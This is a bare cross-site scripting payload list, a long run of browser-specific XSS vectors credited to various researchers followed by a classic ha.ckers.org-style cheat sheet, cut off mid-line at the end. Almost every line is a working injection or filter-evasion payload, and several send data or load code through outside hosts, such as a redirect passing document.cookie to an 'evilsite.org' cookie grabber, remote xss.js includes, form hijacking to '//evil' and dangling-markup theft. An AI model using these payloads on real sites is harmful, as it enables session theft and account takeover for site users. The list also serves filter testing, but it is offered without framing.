\n\u003csvg\u003e\u003cscript\u003e/*\u0026midast;\u0026sol;alert(' @0x6D6172696F ')\u0026sol;\u0026sol;*/\u003c/script\u003e\u003c/svg\u003e​  \n#VBScript Event Handling: [Sub XXX_OnError MsgBox \" @0x6D6172696F \" End Sub]  \nif(1)alert(' @jackmasa ')}{ works in firebug and webkit's console \n\u003csvg\u003e\u003cscript onlypossibleinopera:-)\u003e alert(1) #opera  by @soaj1664ashar \n\u003c![if\u003ciframe/onload=vbs::alert[:]\u003e #IE  by @0x6D6172696F, @jackmasa \n\u003csvg\u003e\u003cscript/XL:href=\u0026VeryThinSpace;data\u0026colon;;;;base64;;;;\u0026comma;\u0026lt;\u0026gt;啊YWx啊lc啊nQ啊oMSk啊=\u003e mix!  #opera by @jackmasa \n\u003c! XSS=\"\u003e\u003cimg src=xx:x onerror=alert(1)//\"\u003e  #Firefox #Opera #Chrome #Safari #XSS \ndocument.body.innerHTML=('\u003c\\000\\0i\\000mg src=xx:x onerror=alert(1)\u003e')  #IE #XSS \nheader('Refresh: 0;url=javascript:alert(1)'); \n\u003cscript language=vbs\u003e\u003c/script\u003e\u003cimg src=xx:x onerror=\"::alert' @insertScript '::\"\u003e \n\u003ca href=\"data:text/html,\u003cscript\u003eeval(name)\u003c/script\u003e\" target=\"alert(' @garethheyes @0x6D6172696F ')\"\u003eclick\u003c/a\u003e \n#CSS expression \u003cstyle\u003e*{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}\u003c/style\u003e \n#ES #FF for(location of ['javascript:alert(/ff/)']); \n#E4X function::['location']='javascript'':alert(/FF/)' \nHTML5 entity char \u003ca href=\"javas\u0026Tab;cri\u0026NewLine;pt:alert(' @garethheyes ')\"\u003etest\u003c/a\u003e \n#Firefox \u003ca href=\"x:alert(1)\" id=\"test\"\u003eclick\u003c/a\u003e \u003cscript\u003eeval(test'')\u003c/script\u003e by @cgvwzq \n\u003cdiv style=\"color:rgb(''\u0026#0;x:expression(alert(URL=1))\"\u003e\u003c/div\u003e CSS and CSS :P \ntoUpperCase XSS document.write('\u003cı onclıck=\u0026#97\u0026#108\u0026#101\u0026#114\u0026#116\u0026#40\u0026#49\u0026#41\u003easd\u003c/ı\u003e'.toUpperCase())  by @jackmasa \nIE6-8,IE9(quick mode) with jQuery\u003c1.7 $(\"button\").val(\"\u003ciframe src=vbscript:alert(1)\u003e\") by @masa141421356  \naha \u003cscript src=\u003ealert(/IE|Opera/)\u003c/script\u003e \nOpera bug? \u003cimg src=//\\ onload=alert(1)\u003e  \nUse 127.1 no 127.0.0.1  by @jackmasa \nIE vector location='\u0026#118\u0026#98\u0026#115\u0026#99\u0026#114\u0026#105\u0026#112\u0026#116\u0026#58\u0026#97\u0026#108\u0026#101\u0026#114\u0026#116\u0026#40\u0026#49\u0026#41'  \n#jQuery super less-xss,work in IE: $(URL) 6 chars  \n#Bootstrap tooltip.js xss  some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap \ninnerText DOM XSS: innerHTML=innerText  \nUsing IE XSS filter or Chrome xss auditor to block \u003cmeta\u003e url redirect.  \njQuery 1.8 a new method: $.parseHTML('\u003cimg src=xx:X onerror=alert(1)\u003e')  \nIE all version CSRF vector \u003cimg lowsrc=//google.com\u003e  \nTiming vector \u003cimg src=//ixss.sinaapp.com/sleep.php\u003e \nFirefox data uri can inherit dom-access. \u003ciframe src=\"data:D,\u003cscript\u003ealert(top.document.body.innerHTML)\u003c/script\u003e\"\u003e  \nIE9 \u003cscript/onload=alert(1)\u003e\u003c/script\u003e \nWebkit and FF \u003cstyle/onload=alert(1)\u003e \nFirefox E4X vector alert(\u003cxss\u003exs{[function::status]}s\u003c/xss\u003e) it is said E4H would replace E4X :P \nIE8 document.write('\u003cimg src=\"\u003ciframe/onload=alert(1)\u003e\\0\"\u003e') \nIf you want to share your cool vector, please do not hesitate to let me know :) \nASP trick: ?input1=\u003cscript/\u0026in%u2119ut1=\u003eal%u0117rt('1')\u003c/script\u003e by @IRSDL \nNew spec:\u003ciframe srcdoc=\"\u003csvg/onload=alert(domain)\u003e\"\u003e #chrome 20 by @0x6D6172696F  \n#Firefox syntax broken try{*}catch(e if(alert(1))){} by @garethheyes  \nJSON XSS Tips: /json.cgi?a.html by @hasegawayosuke \nJSON XSS Tips: /json/.html with PHP and .NET by or /json;.html with JSP by @superevr \nß=ss \u003ca href=\"http://ß.lv\"\u003eclick\u003c/a\u003e by @_cweb  \n\u003ca href=\"http://www。example。com\"\u003eclick\u003c/a\u003e by @_cweb  \nFirefox link host dom xss https://t.co/aTtzHaaG by @garethheyes \n\u003ca href=\"http://www﹒example﹒com \"\u003eclick\u003c/a\u003e by @_cweb  \nhistory.pushState([],[],'/xssvector') HTML5 URL spoofing! \nClickjacking with history.forward() and history.back()  by @lcamtuf \nInertia-Clickjacking for(i=10;i\u003e1;i--)alert(i);new ActiveXObject(\"WScript.shell\").Run('calc.exe',1,true); by @80vul \nXHTML Entity Hijacking [\u003c!ENTITY nbsp \"'\"\u003e]  by @masa141421356 \nFirefox \u003cimg src=javascript:while([{}]);\u003e \nIE \u003c!--[if\u003cimg src=x:x onerror=alert(5)//]--\u003e by @0x6D6172696F H5SC#115  \nFirefox funny vector for(i=0;i\u003c100;) find(); by @garethheyes \nIE breaking framebusting vector \u003cscript\u003evar location={};\u003c/script\u003e \nIE JSON hijack with UTF-7 json={'x':'',x:location='1'} \u003cscript src=... charset=utf-7\u003e\u003c/script\u003e \nFirefox \u003ciframe src=view-source://xxxx.com\u003e; with drag and drop \n\u003cbutton form=hijack_form_id formaction=//evil style=\"position:absolute;left:0;top:0;width:100%;height:100%\"\u003e\u003cplaintext\u003e form hijacking \nDangling markup injection \u003cimg src='//evil by @lcamtuf \nWebkit \u003ciframe\u003e viewsource attribute:  // \u003ciframe viewsource src=\"//test.de\"\u003e\u003c/iframe\u003e by @0x6D6172696F \nDOM clobbering:\u003cform name=location \u003e clobbered location object on IE. \nDOM clobbering:\u003cform name=document\u003e\u003cimage name=body\u003e clobbered document-\u003ebody \n\u003cisindex formaction=javascript:alert(1)\u003e by @jackmasa \nClassic IE backtick DOM XSS: \u003cimg src=\"xx:x\" alt=\"``onerror=alert(1)\"\u003e\u003cscript\u003edocument.body.innerHTML=''\u003c/script\u003e \nFirefox \u003ca href=\"https://4294967298915183000\"\u003eclick\u003c/a\u003e=\u003egoogle by @garethheyes \n\u003ca href=\"data:text/html;base64xoxoxox,\u003cbody/onload=alert(1)\u003e\"\u003eclick\u003c/a\u003e by @kkotowicz \nOpera \u003ca href=\"data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ\u003c\u003e\u003e9YWxlc\u003e\u003e\u003enQoMSk\"\u003eclick\u003c/a\u003e variant base64 encode. by @jackmasa \nOpera \u003csvg\u003e\u003cimage x:href=\"data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"\u003e by LeverOne H5SC#88 \nWebkit and Opera \u003ca href=\"\\/www.google.com/favicon.ico\"\u003eclick\u003c/a\u003e by @kkotowicz \nFF \u003ca href=\"//ⓜⓜⓜⓔ︒ⓜⓔ\"\u003eclick\u003c/a\u003e url trick by @jackmasa \nIE \u003cscript\u003e-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}\u003c/script\u003e @thornmaker , @sirdarckcat \n\u003ci/onclick=URL=name\u003e IE less xss,20 chars. by @0x6D6172696F \n\u003ca rel=\"noreferrer\" href=\"//google.com\"\u003eclick\u003c/a\u003e no referrer by @sneak_ \nFF \u003cimg src=\"jar:!/\"\u003e no referrer by @sneak_ \nNo dos expression vector \u003ci style=x:expression(alert(URL=1))\u003e by @jackmasa \n\u003csvg\u003e\u003cstyle\u003e*{font-family:'\u003csvg onload=alert(1)\u003e';}\u003c/style\u003e\u003c/svg\u003e by @0x6D6172696F \nJSLR( @garethheyes ) challenge result: \n@irsdl challenge result:  \n\u003cbody onload='vbs:Set x=CreateObject(\"Msxml2.XMLHTTP\"):x.open\"GET\",\".\":x.send:MsgBox(x.responseText)'\u003e Vbscript XHR by @masa141421356 \nXML Entity XSS  by @garethheyes \nWebkit \u003csvg/onload=domain=id\u003e cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa \n\u003cstyle\u003e@import//evil? \u003e\u003e\u003esteal me!\u003c\u003c\u003c scriptless by @garethheyes \nIE \u003cinput value=\"\u003cscript\u003ealert(1)\u003c/script\u003e\" ` /\u003e by @hasegawayosuke \n\u003cxmp\u003e\u003cimg alt=\"\u003c/xmp\u003e\u003cimg src=xx:x onerror=alert(1)//\"\u003e Classic vector by slacker :D \n\u003ca href=\"#\" onclick=\"alert(' \u0026#39\u0026#41\u0026#59\u0026#97\u0026#108\u0026#101\u0026#114\u0026#116\u0026#40\u0026#50 ')\"\u003ename\u003c/a\u003e Classic html entity inject vector \nA nice opera xss: Put 65535 Bytes before and Unicode Sign  by @insertScript \n\u003ciframe src=\"jar://html5sec.org/test.jar!/test.html\"\u003e\u003c/iframe\u003e Upload a jar file =\u003e Firefox XSS by @0x6D6172696F \nJS Array Hijacking with MBCS encodings ppt  by @hasegawayosuke \n\u003cmeta http-equiv=\"refresh\" content=\"0;url=http://good/[\u003e\u003e\u003einj]\u0026#59url=http://evil/[\u003c\u003c\u003cinj]\"\u003e IE6-7 Inject vector by @kinugawamasato \nIE UTF7 BOM XSS \u003clink rel=stylesheet href='data:,?*%7bx:expression(alert(1))%7D' \u003e by @garethheyes \n\u003csvg\u003e\u003cscript\u003ea='\u003csvg/onload=alert(1)\u003e\u003c/svg\u003e';alert(2)\u003c/script\u003e by @0x6D6172696F , @jackmasa \nOpera \u003csvg\u003e\u003canimation x:href=javascript:alert(1)\u003e SVG animation vector by @0x6D6172696F \n\u003cmeta charset=gbk\u003e\u003cscript\u003ea='xࠄ\\';alert(1)//';\u003c/script\u003e by @garethheyes \nFF \u003ca href=\"data:),\u003c s c r i p t \u003e a l e r t ( document.domain ) \u003c / s c r i p t \u003e\"\u003eCLICK\u003c/a\u003e by @0x6D6172696F \n\u003cnoscript\u003e\u003c!--\u003c/noscript\u003e\u003cimg src=xx:x onerror=alert(1) --\u003e non-IE \n\u003csvg\u003e\u003cscript xlink:href=\"data:,alert(1)\"\u003e by @0x6D6172696F \nFirefox statusline spoofing\u003cmath\u003e\u003cmaction actiontype=\"statusline#http://google.com\" href=\"//evil\"\u003eclick by LeverOne  \n\u003csvg\u003e\u003coooooo/oooooooooo/onload=alert(1) \u003e by @jackmasa \n\u003cmath\u003e\u003cscript\u003esgl='\u003cimg/src=xx:x onerror=alert(1)\u003e'\u003c/script\u003e chrome firefox opera vector by @jackmasa \nFF \u003capplet code=javascript:alert('sgl')\u003e by @jackmasa \nNice IE DOM XSS: \u003cdiv id=d\u003e\u003cx xmlns=\"\u003e\u003cbody onload=alert(1)\"\u003e\u003cscript\u003ed.innerHTML=‘’\u003c/script\u003e  by LeverOne \n\u003cscript\u003eRuntimeObject(\"w*\")[\"window\"][\"alert\"](1);\u003c/script\u003e IE a new method get window object! by @s_hskz \n\u003cbody onload=\"$})}}}});alert(1);({0:{0:{0:function(){0({\"\u003e Chrome crazy vector! by @cgvwzq \nIE \u003c!-- `\u003cimg/src=xx:xx onerror=alert(1)//--!\u003e by @jackmasa H5SC: \n\u003ca href=\"javascript\u0026colon;alert\u0026lpar;1\u0026rpar;\"\u003eclick\u003c/a\u003e non-IE \n\u003ca href=\"feed:javascript\u0026colon;alert(1)\"\u003eclick\u003c/a\u003e Firefox \n\u003clink href=\"javascript:alert(1)\" rel=\"next\"\u003e Opera, pressing the spacebar execute! by @shafigullin \n\u003cembed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always\u003e works on webkit by @garethheyes \n\n▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉\nMORE VECTORS:\n\n\u003cIMG SRC=javascript:alert(String.fromCharCode(88,83,83))\u003e\n\"\u003e\u003cscript\u003ealert(0)\u003c/script\u003e\n\u003cscript src=http://yoursite.com/your_files.js\u003e\u003c/script\u003e\n\u003c/title\u003e\u003cscript\u003ealert(/xss/)\u003c/script\u003e\n\u003c/textarea\u003e\u003cscript\u003ealert(/xss/)\u003c/script\u003e\n\u003cIMG LOWSRC=\"javascript:alert('XSS')\"\u003e\n\u003cIMG DYNSRC=\"javascript:alert('XSS')\"\u003e\n\u003cfont style='color:expression(alert(document.cookie))'\u003e\n\u003cimg src=\"javascript:alert('XSS')\"\u003e\n\u003cscript language=\"JavaScript\"\u003ealert('XSS')\u003c/script\u003e\n[url=javascript:alert('XSS');]click me[/url]\n\u003cbody onunload=\"javascript:alert('XSS');\"\u003e\n\u003cscript\u003ealert(1);\u003c/script\u003e\n\u003cscript\u003ealert('XSS');\u003c/script\u003e\n\u003cscript src=\"http://www.evilsite.org/cookiegrabber.php\"\u003e\u003c/script\u003e\n\u003cscript\u003elocation.href=\"http://www.evilsite.org/cookiegrabber.php?cookie=\"??(document.cookie)\u003c/script\u003e\n\u003cscr\u003cscript\u003eipt\u003ealert('XSS');\u003c/scr\u003c/script\u003eipt\u003e\n\u003cscript\u003ealert(String.fromCharCode(88,83,83))\u003c/script\u003e\n\u003cimg src=foo.png onerror=alert(/xssed/) /\u003e   \n\u003cstyle\u003e@import'javascript:alert(\"XSS\")';\u003c/style\u003e   \n\u003c? echo('\u003cscr)'; echo('ipt\u003ealert(\"XSS\")\u003c/script\u003e'); ?\u003e   \n\u003cmarquee\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e\u003c/marquee\u003e   \n\u003cIMG SRC=\"jav\u0026#x09;ascript:alert('XSS');\"\u003e   \n\u003cIMG SRC=\"jav\u0026#x0A;ascript:alert('XSS');\"\u003e   \n\u003cIMG SRC=\"jav\u0026#x0D;ascript:alert('XSS');\n\u003cbody onLoad=\"alert('XSS');\"   \n[color=red' onmouseover=\"alert('xss')\"]mouse over[/color] \n\"/\u003e\u003c/a\u003e\u003c/\u003e\u003cimg src=1.gif onerror=alert(1)\u003e\nwindow.alert(\"Bonjour !\");   \n\u003cdiv style=\"x:expression((window.r==1)?'':eval('r=1;   \nalert(String.fromCharCode(88,83,83));'))\"\u003e   \n\u003ciframe\u003c?php echo chr(11)?\u003e onload=alert('XSS')\u003e\u003c/iframe\u003e   \n\"\u003e\u003cscript alert(String.fromCharCode(88,83,83))\u003c/script\u003e   \n'\u003e\u003e\u003cmarquee\u003e\u003ch1\u003eXSS\u003c/h1\u003e\u003c/marquee\u003e   \n'\"\u003e\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e   \n'\"\u003e\u003e\u003cmarquee\u003e\u003ch1\u003eXSS\u003c/h1\u003e\u003c/marquee\u003e   \n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"\u003e   \n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"\u003e   \n\u003cscript\u003evar var = 1; alert(var)\u003c/script\u003e   \n\u003cSTYLE type=\"text/css\"\u003eBODY{background:url(\"javascript:alert('XSS')\")}\u003c/STYLE\u003e   \n\u003c?='\u003cSCRIPT\u003ealert(\"XSS\")\u003c/SCRIPT\u003e'?\u003e   \n\u003cIMG SRC='vbscript:msgbox(\"XSS\")'\u003e   \n\" onfocus=alert(document.domain) \"\u003e \u003c\"   \n\u003cFRAMESET\u003e\u003cFRAME SRC=\"javascript:alert('XSS');\"\u003e\u003c/FRAMESET\u003e   \n\u003cSTYLE\u003eli {list-style-image: url(\"javascript:alert('XSS')\");}\u003c/STYLE\u003e\u003cUL\u003e\u003cLI\u003eXSS   \nperl -e 'print \"\u003cSCR\\0IPT\u003ealert(\"XSS\")\u003c/SCR\\0IPT\u003e\";' \u003e out   \nperl -e 'print \"\u003cIMG SRC=java\\0script:alert(\"XSS\")\u003e\";' \u003e out   \n\u003cbr size=\"\u0026{alert('XSS')}\"\u003e   \n\u003cscrscriptipt\u003ealert(1)\u003c/scrscriptipt\u003e   \n\u003c/br style=a:expression(alert())\u003e   \n\u003c/script\u003e\u003cscript\u003ealert(1)\u003c/script\u003e \n\u003cSCRIPT\u003edocument.write(\"XSS\");\u003c/SCRIPT\u003e   \na=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert('xss');\";eval(a?);   \n='\u003e\u003cscript\u003ealert(\"xss\")\u003c/script\u003e\n\u003cisindex action=\"javas\u0026Tab;cript:alert(1)\" type=image\u003e\n\u003cscript?=\"\u003e\"?=\"http://yoursite.com/xss.js?69,69\"\u003e\u003c/script\u003e   \n\u003cbody background=javascript:'\"\u003e\u003cscript\u003ealert(navigator.userAgent)\u003c/script\u003e\u003e\u003c/body\u003e   \n\"\u003e/XaDoS/\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\u003cscript\u003e  src=\"http://www.site.com/XSS.js\"\u003e\u003c/script\u003e   \n\"\u003e/KinG-InFeT.NeT/\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e   \nsrc=\"http://www.site.com/XSS.js\"\u003e\u003c/script\u003e \n\"\u003e\u003cBODY onload!#$%\u0026()*~+_.,:;?@[/|]^`=alert(\"XSS\")\u003e   \n[color=red width=expression(alert(123))][color]   \n\u003cBASE HREF=\"javascript:alert('XSS');//\"\u003e   \nExecute(MsgBox(chr(88)\u0026chr(83)\u0026chr(83)))\u003c   \n\"\u003e\u003c/iframe\u003e\u003cscript\u003ealert(123)\u003c/script\u003e   \n\u003cbody onLoad=\"while(true) alert('XSS');\"\u003e   \n'\"\u003e\u003c/title\u003e\u003cscript\u003ealert(1111)\u003c/script\u003e   \n\u003c/textarea\u003e'\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e   \n'\"\"\u003e\u003cscript language=\"JavaScript\"\u003e alert('X nS nS');\u003c/script\u003e   \n\u003c/script\u003e\u003c/script\u003e\u003c\u003c\u003c\u003cscript\u003e\u003c\u003e\u003e\u003e\u003e\u003c\u003c\u003cscript\u003ealert(123)\u003c/script\u003e  \n\u003cINPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"\u003e   \n'\u003e\u003c/select\u003e\u003cscript\u003ealert(123)\u003c/script\u003e   \n'\u003e\"\u003e\u003cscript src = 'http://www.site.com/XSS.js'\u003e\u003c/script\u003e   \n}\u003c/style\u003e\u003cscript\u003ea=eval;b=alert;a(b(/XSS/.source));\u003c/script\u003e\n\u003chtml\u003e\u003cnoalert\u003e\u003cnoscript\u003e(123)\u003c/noscript\u003e\u003cscript\u003e(123)\u003c/script\u003e\n\u003cIMG SRC=JaVaScRiPt:alert('XSS')\u003e\n\u003cIMG SRC=javascript:alert('XSS')\u003e\n\u003cIMG SRC=\"javascript:alert('XSS');\"\u003e\n\u003cIMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`\u003e\n\u003cIMG SRC=\"jav\tascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x09;ascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x0A;ascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x0D;ascript:alert('XSS');\"\u003e\n\u003cBODY onload!#$%\u0026()*~+_.,:;?@[/|]^`=alert(\"XSS\")\u003e\n\u003cSCRIPT/SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003c\u003cSCRIPT\u003ealert(\"XSS\");//\u003c\u003c/SCRIPT\u003e\n\u003cSCRIPT SRC=//ha.ckers.org/.j\u003e\n\u003cIMG SRC=\"javascript:alert('XSS')\"\n\u003ciframe src=http://ha.ckers.org/scriptlet.html \u003c\n\";alert('XSS');//\n\u003c/TITLE\u003e\u003cSCRIPT\u003ealert(\"XSS\");\u003c/SCRIPT\u003e\n\u003cINPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"\u003e\n\u003cBODY BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cIMG DYNSRC=\"javascript:alert('XSS')\"\u003e\n\u003cIMG LOWSRC=\"javascript:alert('XSS')\"\u003e\n\u003cSTYLE\u003eli {list-style-image: url(\"javascript:alert('XSS')\");}\u003c/STYLE\u003e\u003cUL\u003e\u003cLI\u003eXSS\u003c/br\u003e\n\u003cIMG SRC='vbscript:msgbox(\"XSS\")'\u003e\n\u003cIMG SRC=\"livescript:[code]\"\u003e\n\u003cBODY ONLOAD=alert('XSS')\u003e\n\u003cBGSOUND SRC=\"javascript:alert('XSS');\"\u003e\n\u003cBR SIZE=\"\u0026{alert('XSS')}\"\u003e\n\u003cLINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"\u003e\n\u003cLINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\"\u003e\n\u003cSTYLE\u003e@import'http://ha.ckers.org/xss.css';\u003c/STYLE\u003e\n\u003cMETA HTTP-EQUIV=\"Link\" Content=\"\u003chttp://ha.ckers.org/xss.css\u003e; REL=stylesheet\"\u003e\n\u003cSTYLE\u003eBODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}\u003c/STYLE\u003e\n\u003cSTYLE\u003e@import'javascript:alert(\"XSS\")';\u003c/STYLE\u003e\n\u003cIMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"\u003e\n\u003cSTYLE\u003e.XSS{background-image:url(\"javascript:alert('XSS')\");}\u003c/STYLE\u003e\u003cA CLASS=XSS\u003e\u003c/A\u003e\n\u003cSTYLE type=\"text/css\"\u003eBODY{background:url(\"javascript:alert('XSS')\")}\u003c/STYLE\u003e\n\u003cXSS STYLE=\"xss:expression(alert('XSS'))\"\u003e\n\u003cXSS STYLE=\"behavior: url(xss.htc);\"\u003e\n\u003ca \u003c!-- --\u003e href=\"j\u0026#x61;vascript:\u0026#x61;lert(-1)\"\u003ehello\u003c/a\u003e\n\u003ca href=\"j\u0026#x61;vascript:\u0026#x61;lert(-1)\"\n\u003ca href=\"j\u0026#00097;vascript:alert%252831337%2529\"\u003eHello\u003c/a\u003e\n\u003ca \u003c!-- href=\"j\u0026#x61;vascript:\u0026#x61;lert\u0026#x28;31337\u0026#x29;;\"\u003eHello\u003c/a\u003e\n\u003cimg src=\"http://www.w3schools.com/tags/planets.gif\" width=\"145\" height=\"126\" alt=\"Planets\" usemap=\"#planetmap\"\u003e\u003cmap name=\"planetmap\"\u003e\u003carea shape=\"rect\" coords=\"0,0,145,126\" a-=\"\u003e\" href=\"j\u0026#x61;vascript:\u0026#x61;lert(-1)\"\u003e\u003c/map\u003e\n\u003cIMG SRC=\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;\u0026#97;\u0026#108;\u0026#101;\u0026#114;\u0026#116;\u0026#40;\u0026#39;\u0026#88;\u0026#83;\u0026#83;\u0026#39;\u0026#41;\u003e\n\u003cIMG SRC=\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u003e\n\u003cIMG SRC=\u0026#x6A\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x70\u0026#x74\u0026#x3A\u0026#x61\u0026#x6C\u0026#x65\u0026#x72\u0026#x74\u0026#x28\u0026#x27\u0026#x58\u0026#x53\u0026#x53\u0026#x27\u0026#x29\u003e\n\" onhover=\"j\u0026#x61;vascript:\u0026#x61;lert(-1)\"\n\"\u003e\u003cscript\u003ealert('test')\u003c/script\u003e\n\n▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉\nha.ckers.org / sla.ckers.org\n\n';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\u003e\u003c/SCRIPT\u003e--!\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\n\u003cSCRIPT SRC=http://ha.ckers.org/xss.js\u003e\u003c/SCRIPT\u003e\n\u003cIMG SRC=\"javascript:alert('XSS');\"\u003e\n\u003cIMG SRC=JaVaScRiPt:alert('XSS')\u003e\n\u003cIMG SRC=javascript:alert(\u0026quot;XSS\u0026quot;)\u003e\n\u003cIMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`\u003e\n\u003cIMG \"\"\"\u003e\u003cSCRIPT\u003ealert(\"XSS\")\u003c/SCRIPT\u003e\"\u003e\n\u003cIMG SRC=javascript:alert(String.fromCharCode(88,83,83))\u003e\n\u003cIMG SRC=\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;\u0026#97;\u0026#108;\u0026#101;\u0026#114;\u0026#116;\u0026#40;\u0026#39;\u0026#88;\u0026#83;\u0026#83;\u0026#39;\u0026#41;\u003e\n\u003cIMG SRC=\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u003e\n\u003cIMG SRC=\u0026#x6A\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x70\u0026#x74\u0026#x3A\u0026#x61\u0026#x6C\u0026#x65\u0026#x72\u0026#x74\u0026#x28\u0026#x27\u0026#x58\u0026#x53\u0026#x53\u0026#x27\u0026#x29\u003e\n\u003cIMG SRC=\"jav\tascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x09;ascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x0A;ascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x0D;ascript:alert('XSS');\"\u003e\n\u003cIMG\nSRC\n=\n\"\nj\na\nv\na\ns\nc\nr\ni\np\nt\n:\na\nl\ne\nr\nt\n(\n'\nX\nS\nS\n'\n)\n\"\n\u003e\n\u003cIMG SRC=\" \u0026#14;  javascript:alert('XSS');\"\u003e\n\u003cSCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cBODY onload!#$%\u0026()*~+_.,:;?@[/|\\]^`=alert(\"XSS\")\u003e\n\u003c\u003cSCRIPT\u003ealert(\"XSS\");//\u003c\u003c/SCRIPT\u003e\n\u003cSCRIPT SRC=http://ha.ckers.org/xss.js?\u003cB\u003e\n\u003cSCRIPT SRC=//ha.ckers.org/.j\u003e\n\u003cIMG SRC=\"javascript:alert('XSS')\"\n\u003ciframe src=http://ha.ckers.org/scriptlet.html \u003c\n\u003cSCRIPT\u003ea=/XSS/\nalert(a.source)\u003c/SCRIPT\u003e\n\";alert('XSS');//\n\u003c/TITLE\u003e\u003cSCRIPT\u003ealert(\"XSS\");\u003c/SCRIPT\u003e\n\u003cINPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"\u003e\n\u003cBODY BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cBODY ONLOAD=alert('XSS')\u003e\n\u003cIMG DYNSRC=\"javascript:alert('XSS')\"\u003e\n\u003cIMG LOWSRC=\"javascript:alert('XSS')\"\u003e\n\u003cBGSOUND SRC=\"javascript:alert('XSS');\"\u003e\n\u003cBR SIZE=\"\u0026{alert('XSS')}\"\u003e\n\u003cLAYER SRC=\"http://ha.ckers.org/\nscriptlet.html\"\u003e\u003c/LAYER\u003e\n\u003cLINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"\u003e\n\u003cLINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\"\u003e\n\u003cSTYLE\u003e@import'http://ha.ckers.org/xss.css';\u003c/STYLE\u003e\n\u003cMETA HTTP-EQUIV=\"Link\" Content=\"\u003chttp://ha.ckers.org/xss.css\u003e; REL=stylesheet\"\u003e\n\u003cSTYLE\u003eBODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}\u003c/STYLE\u003e\n\u003cXSS STYLE=\"behavior: url(xss.htc);\"\u003e\n\u003cSTYLE\u003eli {list-style-image: url(\"javascript:alert('XSS')\");}\u003c/STYLE\u003e\u003cUL\u003e\u003cLI\u003eXSS\n\u003cIMG SRC='vbscript:msgbox(\"XSS\")'\u003e\n\u003cIMG SRC=\"mocha:[code]\"\u003e\n\u003cIMG SRC=\"livescript:[code]\"\u003e\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"\u003e\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"\u003e\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"\u003e\n\u003cIFRAME SRC=\"javascript:alert('XSS');\"\u003e\u003c/IFRAME\u003e\n\u003cFRAMESET\u003e\u003cFRAME SRC=\"javascript:alert('XSS');\"\u003e\u003c/FRAMESET\u003e\n\u003cTABLE 